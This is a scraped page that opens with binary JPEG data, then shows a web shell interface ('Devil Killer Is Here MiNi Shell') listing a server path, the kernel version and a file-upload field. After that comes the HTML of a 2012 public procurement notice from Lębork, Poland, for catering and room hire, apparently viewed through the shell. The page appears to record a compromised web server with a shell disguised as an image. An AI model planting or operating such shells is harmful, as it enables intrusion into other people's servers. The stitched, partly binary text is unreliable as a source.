JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/262334-N-2012.html

<p class="kh_header"><b>Lębork: Świadczenie usług cateringowych oraz wynajmu sal (w częściach 2 i 3) w ramach projektu innowacyjnego pn. Droga do samodzielności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej)</b><br>
<b>Numer ogłoszenia: 262334 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych oraz wynajmu sal (w częściach 2 i 3) w ramach projektu innowacyjnego pn. Droga do samodzielności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje świadczenie usług cateringowych (polegających na przygotowaniu, dostarczeniu i podaniu cateringu) w ramach projektu pn. Droga do samodzielności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej) podczas zaplanowanych do realizacji następujących działań przedstawionych w częściach:
a)	Część 1 - catering na spotkania zespołu ekspertów (catering bez wynajmu sali)
b)	Część 2 - wynajem sal wraz z cateringiem na konferencję informacyjno-promocyjną na rozpoczęcie realizacji projektu 
c)	Część 3 - wynajem sal wraz z cateringiem na seminarium tematyczne (konsultacje społeczne) - działanie upowszechniająco - włączające 

CZĘŚĆ 1 - CATERING NA SPOTKANIA ZESPOŁU EKSPERTÓW

Przedmiotem zamówienia jest świadczenie usług cateringowych podczas 8 spotkań zespołu ekspertów w Starostwie Powiatowym w Lęborku. Danie obiadowe i deserowe podawane będzie w formie szwedzkiego stołu. 

1.	Terminy i czas trwania

Świadczenie usług cateringowych podczas spotkań zespołu ekspertów  będzie odbywać się w 2012 i 2013 roku - 8 spotkań w przewidywanych miesiącach VIII, X, XI, XII 2012 roku oraz I i II 2013 roku- - wg ustalonego harmonogramu spotkań. W przypadku braku możliwości zorganizowania spotkania w którymś z ww. miesięcy spotkanie zorganizowane będzie w innym miesiącu, jednakże ostatnie spotkanie przypada na miesiąc luty 2013 roku.  
O dokładnej dacie, miejscu i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem.

2.	Przewidywana liczba uczestników spotkań
Planowana liczba osób uczestniczących w każdym spotkaniu - 15 osób. 
Każde spotkanie będzie zorganizowane w jednym dniu i przewidywany okres ich trwania szacuje się na 4 godziny. 

3.	Miejsce świadczenia usług:
Świadczenie usług cateringu odbywać się będzie na terenie Lęborka, w Sali wyposażonej w stoły, tak aby możliwe było serwowanie posiłków w formie szwedzkiego stołu. Salę i dostęp do sali oraz stoły zapewnia Zamawiający.

4.	W ramach świadczenia usług cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania spotkania (serwisu kawowego) oraz przerwy obiadowej
12) zebrania naczyń i uprzątnięcia stołów najpóźniej na 30 minut po opuszczeniu sali przez ekspertów
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca na każde spotkanie przygotuje:

a)	tzw. serwis kawowy do korzystania bez ograniczeń, na który składają się:
- Napoje gorące bez ograniczeń, w tym:
- - Kawy czarnej rozpuszczalnej 
- - Herbaty czarnej tradycyjnej oraz owocowej 
- - Dodatki do napojów bez ograniczeń: cukier, mleczko lub śmietanki do kawy w płynie bez ograniczeń, cytryny w plasterkach do herbaty 
- Napoje zimne bez ograniczeń, w tym:
- - Wody mineralnej niegazowanej 
- - Soków owocowych (co najmniej 2 rodzaje) 
- Drobne przekąski bez ograniczeń:
- Owoce - co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) 
- Ciastka, cukierki - co najmniej po 3 rodzaje
- Serwis kawowy musi być (przygotowany na 30 minut przed rozpoczęciem spotkania, 
z możliwością korzystania aż do zakończenia spotkania).

b)	danie deserowe:
- 3 rodzaje ciast - typu: sernik, jabłecznik, z owocami - każdego typu minimum po 10 porcji po 100 gram każda porcja
- 1 rodzaju małego deseru - różnorodnego dla każdego spotkania, np. galaretka z owocami, lody, słodki naleśnik

6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania, artykuły wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i ich dostawy.
c)	Zamawiający będzie płacił za wykonaną usługę cateringową po każdym spotkaniu w kwocie wynikającej z formularza ofertowego (liczonej jako łączna cena brutto podzielona przez 8) na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu. 

CZĘŚĆ 2 - WYNAJEM SAL WRAZ Z CATERINGIEM NA KONFERENCJĘ INFORMACYJNO-PROMOCYJNĄ NA ROZPOCZĘCIE REALIZACJI PROJEKTU 

Przedmiotem zamówienia jest wynajem 2 sal (sali konferencyjnej oraz sali cateringowej umieszczonych w 1 budynku) połączony ze świadczeniem usługi cateringowej podczas konferencji informacyjno-promocyjnej na rozpoczęcie realizacji projektu na terenie miasta Lęborka. 

1.	Terminy i czas trwania

Konferencja będzie jednodniowa i przewidywany okres jej trwania szacuje się na 4 godziny we wrześniu 2012 roku. 
O dokładnej dacie i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem. 

2.	Przewidywana liczba uczestników konferencji:
Szacunkowa liczba uczestników konferencji to 80 osób. 

3.	Miejsce świadczenia usług:
Wykonawca zapewni wynajem sal:
- sali konferencyjnej, wyposażonej w krzesła w ilości dostosowanej do przewidywanej liczby osób oraz sprzęt multimedialny niezbędny do przeprowadzenia konferencji (ekran, projektor multimedialny oraz laptop).  Wykonawca zapewni także obsługę techniczną sali i sprzętu. 
- osobnej sali na catering w formie stołu szwedzkiego, wyposażonej co najmniej w stoły, przystosowanej do podanej ilości uczestników konferencji.
Obie sale muszą znajdować się w tym samym budynku.
O miejscu realizacji usługi Wykonawca poinformuje Zamawiającego na piśmie w dniu podpisania umowy, jest zobowiązany do uzyskania oficjalnej zgody na organizację konferencji w zaproponowanym miejscu. 
Świadczenie usługi wynajmu sali i organizacji cateringu odbywać się będzie na terenie Lęborka w miejscu o wysokim standardzie, spełniającym wszystkie wymagania bezpieczeństwa i higieny pracy stawiane pomieszczeniom, w których organizowane są konferencje. Pomieszczenia winny charakteryzować się dobrym stanem technicznym (min. podłogi winny być równe i bezpieczne, ściany czyste i estetyczne, krzesła i stoliki w dobrym stanie technicznym i estetycznym). Temperatura w pomieszczeniach nie może być niższa niż 18 stopni Celsjusza.
Wykonawca zapewni miejsce na przechowywanie odzieży wierzchniej i nadzoru nad pozostawioną odzieżą.

4.	W ramach świadczenia usługi cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) ewentualnego transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania konferencji
12) zebrania naczyń i uprzątnięcia stołów 
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca przygotuje catering na konferencję w formie stołu szwedzkiego.

Menu musi składać się co najmniej z:
- Napojów gorących, w tym:
- - kawy czarnej rozpuszczalnej w ilości minimum 200 ml na osobę
- - herbaty czarnej tradycyjnej w ilości minimum 200 ml na osobę
- Cukru bez ograniczeń, mleczka lub śmietanki do kawy w płynie bez ograniczeń, cytryna w plasterkach do herbaty i serwetki dla wszystkich uczestników
- Napojów zimnych, w tym:
- - wody mineralnej niegazowanej - w ilości minimum 150 ml na osobę
- - soków owocowych (co najmniej 2 rodzaje) - w ilości łącznie minimum 200 ml na osobę
- 3 dania na zimno:
- - mix pieczonych mięs i pasztetów - łącznie minimum 5 kg
- - sałatka, co najmniej 3 rodzaje, np. grecka, jarzynowa, ryżowa - łącznie minimum 75 gram na osobę
- - jaja faszerowane - minimum 1 sztuka (połówka) na osobę
Do dań na zimno Wykonawca zapewni świeże pieczywo: białe i ciemne w ilości co najmniej 2 kromki na osobę oraz masło.
- 4 dania na gorąco:
- - zupa:
- - - barszcz czerwony podawany z pasztecikiem/zupa gulaszowa/ strogonow - minimum 10 litrów
- - 3 rodzaje dań mięsnych:
- - - kęski drobiowe - minimum 100 gram na osobę
- - - pulpeciki- minimum 100 sztuk po 75 gram 
- - - krokiety mięsne/grzybowe- łącznie minimum 65 sztuk
Do dań mięsnych na gorąco Wykonawca zapewni ziemniaczki pieczone i frytki - łącznie w ilości minimum 200 gram na osobę.
- Dania deserowe:
- - ciasta - co najmniej 3 rodzaje, typu: sernik, jabłecznik, z owocami - każdego typu minimum po 40 porcji po 100 gram każda porcja
- - owoce- co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) - łącznie minimum 5 kg


6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania, artykuły wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne inne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i realizacji usługi.
c)	Zamawiający będzie płacił za wykonaną usługę wynajmu sali i cateringu po odbyciu konferencji na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu.


CZĘŚĆ 3 - WYNAJEM SAL WRAZ Z CATERINGIEM NA SEMINARIUM TEMATYCZNE (KONSULTACJE SPOŁECZNE) - DZIAŁANIE UPOWSZECHNIAJĄCO - WŁĄCZAJĄCE 

Przedmiotem zamówienia jest wynajem 2 sal (sali seminaryjnej oraz sali cateringowej umieszczonych w 1 budynku) połączony ze świadczeniem usługi cateringowej podczas seminarium na terenie miasta Lęborka.

1.	Terminy i czas trwania

Seminarium będzie jednodniowe i przewidywany okres jego trwania szacuje się na 4 godziny w styczniu 2013 roku. 
O dokładnej dacie i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem. 

2.	Przewidywana liczba uczestników konferencji:
Szacunkowa liczba uczestników seminarium to 50 osób. 

3.	Miejsce świadczenia usług:
Wykonawca zapewni wynajem sal:
- sali seminaryjnej, wyposażonej w krzesła w ilości dostosowanej do przewidywanej liczby osób oraz  sprzęt multimedialny niezbędny do przeprowadzenia seminarium (ekran, projektor multimedialny oraz laptop). Wykonawca zapewni także obsługę techniczną sali i sprzętu. 
- osobnej sali na catering w formie stołu szwedzkiego, wyposażonej co najmniej w stoły, przystosowanej do podanej ilości uczestników seminarium.
Obie sale muszą znajdować się w tym samym budynku.
O miejscu realizacji usługi Wykonawca poinformuje Zamawiającego na piśmie w dniu podpisania umowy, jest zobowiązany do uzyskania oficjalnej zgody na organizację seminarium w zaproponowanym miejscu. 
Świadczenie usługi wynajmu sali i organizacji cateringu odbywać się będzie na terenie Lęborka w miejscu o wysokim standardzie, spełniającym wszystkie wymagania bezpieczeństwa i higieny pracy stawiane pomieszczeniom, w których organizowane są konferencje/seminaria. Pomieszczenia winny charakteryzować się dobrym stanem technicznym (min. podłogi winny być równe i bezpieczne, ściany czyste i estetyczne, krzesła i stoliki w dobrym stanie technicznym i estetycznym). Temperatura w pomieszczeniach nie może być niższa niż 18 stopni Celsjusza.
Wykonawca zapewni miejsce na przechowywanie odzieży wierzchniej i nadzoru nad pozostawioną odzieżą.

4.	W ramach świadczenia usługi cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) ewentualnego transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania seminarium
12) zebrania naczyń i uprzątnięcia stołów 
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca przygotuje catering na seminarium w formie stołu szwedzkiego.

Menu musi składać się co najmniej z:
- Napojów gorących, w tym:
- - kawy czarnej rozpuszczalnej w ilości minimum 200 ml na osobę
- - herbaty czarnej tradycyjnej w ilości minimum 200 ml na osobę
- Cukru bez ograniczeń, mleczka lub śmietanki do kawy w płynie bez ograniczeń, cytryna w plasterkach do herbaty i serwetki dla wszystkich uczestników
- Napojów zimnych, w tym:
- - wody mineralnej niegazowanej - w ilości minimum 150 ml na osobę
- - soków owocowych (co najmniej 2 rodzaje) - w ilości łącznie minimum 200 ml na osobę
- 3 dania na zimno:
- - mix pieczonych mięs i pasztetów - łącznie minimum 3 kg
- - sałatka, co najmniej 3 rodzaje, np. grecka, jarzynowa, ryżowa - łącznie minimum 75 gram na osobę
- - jaja faszerowane - minimum 1 sztuka (połówka) na osobę
Do dań na zimno Wykonawca zapewni świeże pieczywo: białe i ciemne w ilości co najmniej 2 kromki na osobę oraz masło.
- 3 dania na gorąco:
3 rodzaje dań mięsnych:
- - kęski drobiowe - minimum 100 gram na osobę
- - pulpeciki- minimum 70 sztuk po 75 gram 
- - krokiety mięsne/grzybowe- łącznie minimum 45 sztuk
Do dań mięsnych na gorąco Wykonawca zapewni ziemniaczki pieczone i frytki - łącznie w ilości minimum 200 gram na osobę.
- Dania deserowe:
- - ciasta - co najmniej 3 rodzaje, typu: sernik, jabłecznik, z owocami - każdego typu minimum po 25 porcji po 100 gram każda porcja
- - owoce- co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) - łącznie minimum 3 kg

6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne inne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i realizacji usługi.
c)	Zamawiający będzie płacił za wykonaną usługę wynajmu sali i cateringu po odbyciu seminarium na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1, 55.32.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części:
Część 1 - catering na spotkania zespołu ekspertów (catering bez wynajmu sali)
Część 2 - wynajem sal wraz z cateringiem na konferencję informacyjno-promocyjną na rozpoczęcie realizacji projektu
Część 3 - wynajem sal wraz z cateringiem na seminarium tematyczne (konsultacje społeczne) - działanie upowszechniająco - włączające 

Zamawiający wymaga, aby Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał lub wykonuje co najmniej 3 usługi o łącznej wartości co najmniej 2.500 zł brutto, których przedmiotem zamówienia było świadczenie usług cateringowych.

Na potwierdzenie tego Warunku wykonawcy zobowiązani są załączyć do oferty Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w  liczbie co najmniej 3 o łącznej wartości co najmniej 2.500 zł brutto, wg załącznika nr 4 do SIWZ z załączeniem dokumentów potwierdzających należyte wykonanie.

W przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunku udziału w postępowaniu załączy dokumenty zawierające kwoty wyrażone w walutach innych niż PLN, Zamawiający przeliczy je na PLN. Do przeliczenia zostanie zastosowany średni kurs walut NBP obowiązujący w dniu publikacji ogłoszenia o przedmiotowym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
